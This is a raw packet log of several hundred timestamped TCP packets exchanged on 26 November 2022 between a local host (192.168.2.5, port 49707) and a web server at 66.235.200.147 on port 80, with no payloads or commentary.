Nov 26, 2022 11:17:40.108880997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108896017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108906031 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108922958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108933926 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108948946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108958960 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.108974934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.108984947 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109002113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109020948 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109038115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109044075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109061003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109072924 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109085083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109096050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109110117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109119892 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109134912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109146118 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109159946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109169960 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109184980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109196901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109210014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109220982 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109235048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109247923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109258890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109273911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109282017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109294891 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109308958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109322071 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109333992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109349966 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109355927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109375000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109375954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109400034 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109400988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109415054 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109426975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109442949 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109450102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109467983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109474897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109488964 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109500885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109514952 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109525919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109555960 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109560966 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109584093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109586954 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109596968 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109610081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109627962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109632969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109643936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109657049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109668970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109683037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109693050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109708071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109719038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109734058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109745979 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109759092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109771967 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109783888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109796047 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109811068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109822035 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109837055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109848976 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109862089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109873056 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109886885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109899998 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109913111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109924078 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109940052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109950066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109966993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.109977007 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.109992027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110004902 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110018969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110028982 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110044956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110055923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110069990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110081911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110095024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110106945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110133886 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110383034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110415936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110430956 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110440969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110460997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110469103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110483885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110495090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110507965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110522985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110534906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110549927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110564947 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110575914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110593081 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110601902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110621929 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110627890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110649109 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110654116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110662937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110681057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110694885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110706091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110718966 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110733986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110743999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110759020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110770941 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110785961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110795021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110811949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110824108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110837936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110856056 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110872030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110893011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110909939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110914946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110948086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110960960 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110972881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.110984087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.110994101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.111010075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.111031055 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.112886906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.128331900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128360033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128379107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128400087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128418922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128437996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128458023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128462076 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.128479958 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.128483057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128508091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128513098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.128525019 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.128535032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128556013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128575087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128582954 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.128603935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128624916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128643990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128662109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128679991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128701925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128705025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.128705025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.128705025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.128705025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.128734112 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.128734112 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.128739119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128746986 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.128763914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128782988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128801107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128808975 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.128808975 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.128827095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128844023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.128844023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.128851891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128859043 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.128878117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128882885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.128904104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128906965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.128931046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.128931999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128956079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128978014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.128983021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129005909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129012108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129034042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129055023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129070044 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129070044 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129077911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129102945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129103899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129103899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129117012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129131079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129142046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129158020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129167080 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129187107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129189968 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129213095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129230976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129246950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129246950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129254103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129261017 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129280090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129288912 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129307032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129314899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129336119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129337072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129363060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129364014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129386902 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129401922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129420042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129427910 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129443884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129451036 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129468918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129475117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129493952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129504919 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129518986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129524946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129544020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129550934 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129569054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129574060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129595041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129602909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129620075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129638910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129647970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129662991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129674911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129689932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129709005 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129714966 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129745960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129749060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129770994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129790068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129792929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129815102 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129817963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129841089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129843950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129865885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129874945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129894018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129914999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129916906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129937887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129951000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.129962921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129982948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.129992008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130009890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130023003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130034924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130059004 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130059004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130083084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130098104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130106926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130127907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130132914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130151987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130166054 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130177021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130198002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130208969 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130223036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130244017 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130245924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130270004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130275965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130294085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130316019 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130316973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130340099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130348921 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130366087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130384922 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130388975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130402088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130414963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130429029 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130439997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130453110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130467892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130482912 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130492926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130502939 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130520105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130526066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130546093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130553007 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130573034 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130573988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130598068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130603075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130624056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130630016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130650997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130651951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130676985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130680084 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130702972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130707026 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130728960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130729914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130753994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130768061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130779982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130795002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130805969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130811930 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130830050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130840063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130856037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130860090 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130908966 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130913019 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130913019 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130939007 CET	80	49707	66.235.200.147	192.168.2.5
